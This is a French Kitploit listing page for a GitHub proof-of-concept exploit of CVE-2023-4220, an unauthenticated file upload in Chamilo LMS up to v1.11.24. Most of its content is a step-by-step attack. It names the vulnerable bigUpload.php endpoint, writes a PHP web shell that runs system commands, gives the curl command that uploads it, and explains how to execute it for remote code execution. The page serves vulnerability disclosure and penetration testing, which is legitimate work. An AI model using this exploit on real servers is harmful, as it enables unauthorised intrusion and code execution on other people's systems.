Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220 — Exploit de preuve de concept pour CVE-2023-4220 : téléchargement de fichier non authentifié dans Chamilo LMS permettant du XSS stocké et une exécution de code à distance via le déploiement d'un web shell. | Kitploit
Outils/GitHubGitHub/dollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubdollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220

Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220

Exploit de preuve de concept pour CVE-2023-4220 : téléchargement de fichier non authentifié dans Chamilo LMS permettant du XSS stocké et une exécution de code à distance via le déploiement d'un web shell.

Voir le dépôtSite web
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Chamilo-LMS-Unauthenticated-File-Upload-

Téléchargement de fichier sans restriction dans la fonctionnalité de téléchargement de gros fichiers dans /main/inc/lib/javascript/bigupload/inc/bigUpload.php dans Chamilo LMS <= v1.11.24 permet aux attaquants non authentifiés d'effectuer des attaques de cross-site scripting stocké et d'obtenir une exécution de code à distance via le téléchargement d'un web shell.

Version concernée ≤v1.11.24

Identifiant CVE CVE-2023-4220

Résumé de la vulnérabilité

La fonctionnalité de téléchargement de gros fichiers via /main/inc/lib/javascript/bigupload/inc/bigUpload.php permet de télécharger des fichiers arbitraires dans le répertoire /main/inc/lib/javascript/bigupload/files à la racine web.

Preuve de concept

  • Si le répertoire /main/inc/lib/javascript/bigupload/files existe, nous pouvons télécharger un fichier arbitraire comme ;

  • Créez un fichier php malveillant echo '<?php system("whoami"); ?>' > dollarboysushil.php Untitled (1).png

  • Nous pouvons ensuite télécharger ce fichier en exécutant la commande suivante

    root@kitploit:~
    `$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'` 
    

    Untitled (1).png

  • Nous pouvons vérifier que notre fichier a été téléchargé en visitant le répertoire /main/inc/lib/javascript/bigupload/files Untitled (1).png

  • Et nous pouvons l'exécuter en cliquant sur le fichier php, ce qui donne la sortie de la commande whoami Untitled (1).png

Télécharger l’outil